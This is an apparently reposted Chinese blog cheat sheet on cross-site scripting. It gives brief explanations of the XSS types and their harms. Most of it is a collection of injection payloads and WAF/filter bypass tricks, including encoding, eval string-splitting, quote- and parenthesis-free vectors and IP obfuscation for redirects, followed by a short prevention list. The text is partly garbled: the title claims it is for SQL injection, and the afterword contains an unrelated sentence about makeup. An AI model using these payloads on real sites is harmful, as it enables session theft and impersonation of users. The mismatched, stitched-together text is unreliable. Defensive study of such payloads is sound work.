XSS收藏测试|仅用于SQL注入漏洞，危害性极大

vlambda
2022-04-20

XSS收藏测试|仅用于SQL注入漏洞，危害性极大

安全不晚，戳蓝字一建关注千云安全小栈

信息来源 | 整理于网络，侵删

编排| 一位淡然的女子

本文约3761字，阅读约4分钟

简述|Sketch✦

XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。

这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。

攻击成功后，攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

常用的XSS攻击手段和目的

Common XSS attack means and purpose

盗用cookie，获取敏感信息。
利用植入Flash，通过crossdomain权限设置进一步获取更高权限;或者利用Java等得到类似的操作。
利用iframe、frame、XMLHttpRequest或上述Flash等方式，以(被攻击)用户的身份执行一些管理动作，或执行一些一般的操作如发微博、加好友、发私信等操作。
利用可被攻击的域受到其他域信任的特点，以受信任来源的身份请求一些平时不允许的操作，如进行不当的投票活动。
在访问量极大的一些页面上的XSS可以攻击一些小型网站，实现DDOS攻击的效果。

一、

常见的XSS漏洞

0 1

反射型XSS

用户在请求某条URL地址的时候，会携带一部分数据。当客户端进行访问某条链接时，攻击者可以将恶意代码植入到URL，如果服务端未对URL携带的参数做判断或者过滤处理，直接返回响应页面，那么XSS攻击代码就会一起被传输到用户的浏览器，从而触发反射型XSS。例如，当用户进行搜索时，返回结果通常会包括用户原始的搜索内容，如果攻击者精心构造包含XSS恶意代码的链接，诱导用户点击并成功执行后，用户的信息就可以被窃取，甚至可以模拟用户进行一些操作。它的利用过程如图所示。

反射型XSS不会永久存储用户的数据，仅发生在用户的一次访问过程之后。这个过程就像一次反射，因此得名反射型XSS。反射型XSS的触发条件比较苛刻，需要攻击者想方设法引导用户点击链接，但产生的危害不容忽视。

0 2

存储型XSS

存储型XSS又叫持久型。一般而言，它三种XSS里危害最大的一种。此类型的XSS漏洞是由于恶意攻击代码被持久化保存到服务器上，然后被显示到HTML页面之中。这类漏洞经常出现在用户评论的页面，攻击者精心构造XSS代码，保存到数据库中，当其他用户再次访问这个页面时，就会触发并执行恶意的XSS代码，从而窃取用户的敏感信息。它的利用过程如图所示。

0 3

DOM型XSS

DOM-basedXSS漏洞是基于文档对象模型（Document Object Model)的一种漏洞。这种XSS与反射型XSS、持久型XSS在原理上有本质区别，它的攻击代码并不需要服务器解析响应，触发XSS靠的是浏览器端的DOM解析。客户端上的JavaScript脚本可以访问浏览器的DOM并修改页面的内容，不依赖服务器的数据，直接从浏览器端获取数据并执行。

在客户端直接输出DOM内容的时候极易触发DOM型XSS漏洞，如

document.getElementByld(“x’).innerHTML、document.write)等。

二、 XSS漏洞的危害

窃取管理员帐号或Cookie，入侵者可以冒充管理员的身份登录后台。使得入侵者具有恶意操纵后台数据的能力，包括读取、更改、添加、删除一些信息。

窃取用户的个人信息或者登录帐号，对网站的用户安全产生巨大的威胁。例如冒充用户身份进行各种操作。

网站挂马。先将恶意攻击代码嵌入到Web应用程序之中。当用户浏览该挂马页面时，用户的计算机会被植入木马。

发送广告或者垃圾信息。攻击者可以利用XSS漏洞植入广告，或者发送垃圾信息，严重影响到用户的正常使用。

Without any filtering

无任何过滤情况下

一些常见标签

`<scirpt>`

<scirpt>alert("xss");</script>

`<img>`

<img src=1 onerror=alert("xss");>

`<input>`

<input onfocus="alert('xss');">

竞争焦点，从而触发onblur事件
<input onblur=alert("xss") autofocus><input autofocus>

通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
<input onfocus="alert('xss');" autofocus>

`<details>`

<details ontoggle="alert('xss');">

使用open属性触发ontoggle事件，无需用户去触发
<details open ontoggle="alert('xss');">

`<svg>`

<svg onload=alert("xss");>

`<select>`

<select onfocus=alert(1)></select>

通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
<select onfocus=alert(1) autofocus>

`<iframe>`

<iframe onload=alert("xss");></iframe>

`<video>`

<video><source onerror="alert(1)">

`<audio>`

<audio src=x onerror=alert("xss");>

`<body>`

<body/onload=alert("xss");>

利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发

  
    
    
  
   
     
     
   <body
onscroll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

`<textarea>`

  
    
    
  
   
     
     
   <textarea onfocus=alert("xss"); autofocus>

`<keygen>`

  
    
    
  
   
     
     
   <keygen autofocus onfocus=alert(1)> //仅限火狐

`<marquee>`

  
    
    
  
   
     
     
   <marquee onstart=alert("xss")></marquee> //Chrome不行，火狐和IE都可以

`<isindex>`

  
    
    
  
   
     
     
   <isindex type=image src=1 onerror=alert("xss")>//仅限于IE

利用link远程包含js文件

PS：在无CSP的情况下才可以

  
    
    
  
   
     
     
   <link rel=import href="http://127.0.0.1/1.js">

javascript伪协议

<a>标签

  
    
    
  
   
     
     
   <a href="javascript:alert(`xss`);">xss</a>

<iframe>标签

  
    
    
  
   
     
     
   <iframe src=javascript:alert('xss');></iframe>

<img>标签

  
    
    
  
   
     
     
   <img src=javascript:alert('xss')>//IE7以下

<form>标签

  
    
    
  
   
     
     
   <form action="Javascript:alert(1)"><input type=submit>

其它

expression属性

  
    
    
  
   
     
     
   <img style="xss:expression(alert('xss''))"> // IE7以下
<div style="color:rgb(''�x:expression(alert(1))"></div> //IE7以下
<style>#test{x:expression(alert(/XSS/))}</style> // IE7以下

background属性

  
    
    
  
   
     
     
   <table background=javascript:alert(1)></table> //在Opera 10.5和IE6上有效

With filtering

有过滤的情况下

过滤空格

用 /代替空格

过滤关键字

大小写绕过

双写关键字

有些waf可能会只替换一次且是替换为空，这种情况下我们可以考虑双写关键字绕过

字符拼接

利用eval

  
    
    
  
   
     
     
   <
   
     
     
   img 
   
     
     
   src
   
     
     
   =
   
     
     
   "x" 
   
     
     
   onerror
   
     
     
   =
   
     
     
   "a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)"
   
     
     
   >

利用top

  
    
    
  
   
     
     
   <script>top["al"+"ert"](`xss`);</script>

其它字符混淆

有的waf可能是用正则表达式去检测是否有xss攻击，如果我们能fuzz出正则的规则，则我们就可以使用其它字符去混淆我们注入的代码了
下面举几个简单的例子

  
    
    
  
   
     
     
   可利用注释、标签的优先级等
1.<<script>alert("xss");//<</script>
2.<title><img src=</title>><img src=x onerror="alert(`xss`);"> //因为title标签的优先级比img的高，所以会先闭合title，从而导致前面的img标签无效
3.<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>

编码绕过

Unicode编码绕过

  
    
    
  
   
     
     
   <
   
     
     
   img 
   
     
     
   src
   
     
     
   =
   
     
     
   "x" 
   
     
     
   onerror
   
     
     
   =
   
     
     
   "&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;"
   
     
     
   >
   
     
     
   

   
     
     
   

   
     
     
   <
   
     
     
   img 
   
     
     
   src
   
     
     
   =
   
     
     
   "x" 
   
     
     
   onerror
   
     
     
   =
   
     
     
   "eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')"
   
     
     
   >

url编码绕过

  
    
    
  
   
     
     
   <
   
     
     
   img 
   
     
     
   src
   
     
     
   =
   
     
     
   "x" 
   
     
     
   onerror
   
     
     
   =
   
     
     
   "eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"
   
     
     
   >

  
    
    
  
   
     
     
   <iframe ></iframe>

Ascii码绕过

  
    
    
  
   
     
     
   <
   
     
     
   img 
   
     
     
   src
   
     
     
   =
   
     
     
   "x" 
   
     
     
   onerror
   
     
     
   =
   
     
     
   "eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))"
   
     
     
   >

hex绕过

  
    
    
  
   
     
     
   <img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>

八进制

  
    
    
  
   
     
     
   <img src=x onerror=alert('\170\163\163')>

base64绕过

  
    
    
  
   
     
     
   <img onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">

过滤双引号，单引号

1.如果是html标签中，我们可以不用引号。如果是在js中，我们可以用反引号代替单双引号

  
    
    
  
   
     
     
   <img onerror=alert(`xss`);>

2.使用编码绕过，具体看上面我列举的例子，我就不多赘述了

过滤括号

当括号被过滤的时候可以使用throw来绕过

  
    
    
  
   
     
     
   <svg/onload="window.onerror=eval;throw'=alert\x281\x29';">

过滤url地址

使用url编码

  
    
    
  
   
     
     
   <img onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>

使用IP

1.十进制IP

  
    
    
  
   
     
     
   <img onerror=document.location=`http://2130706433/`>

2.八进制IP

  
    
    
  
   
     
     
   <img onerror=document.location=`http://0177.0.0.01/`>

3.hex

  
    
    
  
   
     
     
   <img onerror=document.location=`http://0x7f.0x0.0x0.0x1/`>

4.html标签中用 //可以代替 http://

  
    
    
  
   
     
     
   <img onerror=document.location=`//www.baidu.com`>

5.使用 \\

  
    
    
  
   
     
     
   但是要注意在windows下\本身就有特殊用途，是一个path 的写法，所以\\在Windows下是file协议，在linux下才会是当前域的协议

6.使用中文逗号代替英文逗号
如果你在你在域名中输入中文句号浏览器会自动转化成英文的逗号

  
    
    
  
   
     
     
   <img onerror="document.location=`http://www。baidu。com`">//会自动跳转到百度

如何防止xss：

过滤一些危险字符，以及转义 & < > " ' / 等危险字符；
HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此Cookie；
设置CSP(Content Security Policy)；
输入内容长度限制；

-END-

后记

感觉总结的不是很全面，以后会查漏补缺，如果有师傅发现错误之处，还望斧正。没有什么派，其实化妆和造型都是一种感觉，是对生活当中的积累，再加上天赋，不需要太专业的东西，就可以做的很好。

Reference

参考链接

https://blog.csdn.net/lay_loge/article/details/90440207-「lay_loge」https://xz.aliyun.com/t/4067「七友」

END

vlambda博客
学习文章列表